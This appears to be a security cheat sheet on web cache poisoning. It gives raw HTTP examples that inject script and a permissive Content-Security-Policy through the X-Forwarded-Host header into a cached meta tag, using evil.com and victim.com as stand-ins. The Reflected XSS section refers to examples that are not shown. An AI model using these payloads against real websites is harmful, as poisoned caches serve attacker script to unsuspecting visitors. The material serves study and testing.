Web Cache Poisoning
- [pweb-cache-poisoning](https://portswigger.net/web-security/web-cache-poisoning)
- [Cache_Poisoning](https://owasp.org/www-community/attacks/Cache_Poisoning)
- [0xn3va.gitbook.io](https://0xn3va.gitbook.io/cheat-sheets/web-application/web-cache-poisoning)
Reflected XSS with Cache Poisoning
If the website reflects our arbitrary path in the result such as below.
We may try XSS as below.
If we use Burp Repeater to send the request above, the URL won't be normalized so leads the reflected XSS. Then the cache will be poisoned. In this state, if you ask the victim to visit this URL, they will see this cached result. In other words, the reflected XSS is performed despite URL normalization in the victim's web browsers.
Meta Tag XSS
GET /?id=1 HTTP/1.1
Host: victim.com
X-Forwarded-Host: evil.com
...
<!-- Response -->
HTTP/1.1 200 OK
Cache-Control: public, no-cache
...
<meta property="og:image" content="https://evil.com/example.jpg" />
Exploit
GET /?id=2 HTTP/1.1
Host: victim.com
X-Forwarded-Host: evil.com"><script>alert(1)</script>
...
<!-- Response -->
HTTP/1.1 200 OK
Cache-Control: public, no-cache
...
<meta property="og:image" content="https:/evil.com"><script>alert(1)</script>" />
Meta Tag CSP Overriding
If the website sets CSP (Content-Security-Policy) using meta
tag, we can override this CSP settings by cache poisoning, then we can bypass CSP and may cause other attacks.
GET /?id=2 HTTP/1.1
Host: victim.com
X-Forwarded-Host: victim.com"><meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'unsafe-inline'">
...
<!-- Response -->
HTTP/1.1 200 OK
Cache-Control: public, no-cache
...
<meta property="og:image" content="https:/victim.com"><meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'unsafe-inline'">